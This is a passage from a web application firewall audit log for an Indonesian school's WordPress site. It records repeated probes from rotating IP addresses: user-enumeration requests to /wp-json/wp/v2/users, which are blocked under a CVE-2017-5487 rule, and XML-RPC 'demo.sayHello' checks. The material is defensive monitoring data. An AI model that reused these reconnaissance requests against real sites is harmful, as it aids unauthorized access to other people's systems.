Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453252762344 2798 (- - -) Stopwatch2: 1747453252762344 2798; combined=1244, p1=424, p2=789, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a495733-Z-- --bb0d3a58-A-- [17/May/2025:10:41:00 +0700] aCgFTHyxdQCiyU1ENFcrogAAAAg 103.236.140.4 51066 103.236.140.4 8181 --bb0d3a58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bb0d3a58-C-- demo.sayHello --bb0d3a58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb0d3a58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453260343085 5984 (- - -) Stopwatch2: 1747453260343085 5984; combined=4395, p1=586, p2=3583, p3=32, p4=36, p5=94, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb0d3a58-Z-- --b1900528-A-- [17/May/2025:10:41:42 +0700] aCgFdnyxdQCiyU1ENFcrpAAAAAs 103.236.140.4 51072 103.236.140.4 8181 --b1900528-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1900528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1900528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453302344270 15434 (- - -) Stopwatch2: 1747453302344270 15434; combined=26013, p1=422, p2=870, p3=0, p4=0, p5=12378, sr=73, sw=0, l=0, gc=12343 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1900528-Z-- --cd595757-A-- [17/May/2025:10:41:50 +0700] aCgFfnyxdQCiyU1ENFcrpgAAABE 103.236.140.4 51076 103.236.140.4 8181 --cd595757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cd595757-C-- demo.sayHello --cd595757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd595757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453310620561 3984 (- - -) Stopwatch2: 1747453310620561 3984; combined=2773, p1=394, p2=2231, p3=24, p4=26, p5=59, sr=53, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd595757-Z-- --ac44e876-A-- [17/May/2025:10:45:53 +0700] aCgGcem4kjNN-hEbWjJDWQAAAEw 103.236.140.4 51110 103.236.140.4 8181 --ac44e876-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ac44e876-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac44e876-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453553522493 2970 (- - -) Stopwatch2: 1747453553522493 2970; combined=1273, p1=421, p2=818, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac44e876-Z-- --0fa7de47-A-- [17/May/2025:10:46:00 +0700] aCgGeOm4kjNN-hEbWjJDWgAAAE0 103.236.140.4 51114 103.236.140.4 8181 --0fa7de47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fa7de47-C-- demo.sayHello --0fa7de47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fa7de47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453560528067 6485 (- - -) Stopwatch2: 1747453560528067 6485; combined=4736, p1=639, p2=3847, p3=34, p4=35, p5=104, sr=81, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fa7de47-Z-- --8091c632-A-- [17/May/2025:10:46:17 +0700] aCgGiXyxdQCiyU1ENFcrrgAAAAY 103.236.140.4 51118 103.236.140.4 8181 --8091c632-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8091c632-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8091c632-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453577593631 2862 (- - -) Stopwatch2: 1747453577593631 2862; combined=1306, p1=429, p2=845, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8091c632-Z-- --46b4336f-A-- [17/May/2025:10:46:24 +0700] aCgGkOm4kjNN-hEbWjJDWwAAAE4 103.236.140.4 51128 103.236.140.4 8181 --46b4336f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --46b4336f-C-- demo.sayHello --46b4336f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b4336f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453584202985 4863 (- - -) Stopwatch2: 1747453584202985 4863; combined=3809, p1=468, p2=3137, p3=24, p4=25, p5=92, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b4336f-Z-- --761d3129-A-- [17/May/2025:10:47:22 +0700] aCgGyum4kjNN-hEbWjJDXAAAAFA 103.236.140.4 51132 103.236.140.4 8181 --761d3129-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --761d3129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --761d3129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453642047111 2943 (- - -) Stopwatch2: 1747453642047111 2943; combined=1320, p1=454, p2=836, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --761d3129-Z-- --c0b9b878-A-- [17/May/2025:10:47:30 +0700] aCgG0um4kjNN-hEbWjJDXwAAAFM 103.236.140.4 51140 103.236.140.4 8181 --c0b9b878-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0b9b878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b9b878-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453650259177 3286 (- - -) Stopwatch2: 1747453650259177 3286; combined=1412, p1=468, p2=901, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0b9b878-Z-- --ffe3bd60-A-- [17/May/2025:10:47:30 +0700] aCgG0um4kjNN-hEbWjJDYAAAAFQ 103.236.140.4 51142 103.236.140.4 8181 --ffe3bd60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.35 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ffe3bd60-C-- demo.sayHello --ffe3bd60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffe3bd60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453650359842 5178 (- - -) Stopwatch2: 1747453650359842 5178; combined=4239, p1=448, p2=3557, p3=39, p4=42, p5=89, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffe3bd60-Z-- --86fe7b26-A-- [17/May/2025:10:47:36 +0700] aCgG2Om4kjNN-hEbWjJDYwAAAEE 103.236.140.4 51148 103.236.140.4 8181 --86fe7b26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86fe7b26-C-- demo.sayHello --86fe7b26-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86fe7b26-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453656096717 5662 (- - -) Stopwatch2: 1747453656096717 5662; combined=4145, p1=564, p2=3357, p3=33, p4=36, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86fe7b26-Z-- --3a2aea5b-A-- [17/May/2025:10:47:43 +0700] aCgG33yxdQCiyU1ENFcrsgAAABA 103.236.140.4 51152 103.236.140.4 8181 --3a2aea5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a2aea5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a2aea5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453663749318 2593 (- - -) Stopwatch2: 1747453663749318 2593; combined=1158, p1=408, p2=721, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a2aea5b-Z-- --2f0c5118-A-- [17/May/2025:10:47:51 +0700] aCgG5-m4kjNN-hEbWjJDZgAAAEY 103.236.140.4 51156 103.236.140.4 8181 --2f0c5118-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.102 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f0c5118-C-- demo.sayHello --2f0c5118-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f0c5118-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453671693360 6666 (- - -) Stopwatch2: 1747453671693360 6666; combined=4695, p1=613, p2=3883, p3=36, p4=36, p5=76, sr=81, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f0c5118-Z-- --6fe35525-A-- [17/May/2025:10:48:36 +0700] aCgHFATOsBn9MSWb6WJwJwAAAIE 103.236.140.4 51168 103.236.140.4 8181 --6fe35525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fe35525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fe35525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453716723203 2973 (- - -) Stopwatch2: 1747453716723203 2973; combined=1300, p1=430, p2=833, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fe35525-Z-- --e0700a73-A-- [17/May/2025:10:48:43 +0700] aCgHG-m4kjNN-hEbWjJDaAAAAEo 103.236.140.4 51172 103.236.140.4 8181 --e0700a73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0700a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0700a73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453723890064 2086 (- - -) Stopwatch2: 1747453723890064 2086; combined=1001, p1=360, p2=614, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0700a73-Z-- --71b9aa03-A-- [17/May/2025:10:48:44 +0700] aCgHHOm4kjNN-hEbWjJDaQAAAEk 103.236.140.4 51174 103.236.140.4 8181 --71b9aa03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71b9aa03-C-- demo.sayHello --71b9aa03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71b9aa03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453724050468 6432 (- - -) Stopwatch2: 1747453724050468 6432; combined=4565, p1=620, p2=3767, p3=31, p4=34, p5=67, sr=115, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71b9aa03-Z-- --31165f71-A-- [17/May/2025:10:48:46 +0700] aCgHHgTOsBn9MSWb6WJwKAAAAIA 103.236.140.4 51180 103.236.140.4 8181 --31165f71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31165f71-C-- demo.sayHello --31165f71-F-- HTTP/1.1 301 Moved Permanently Location: 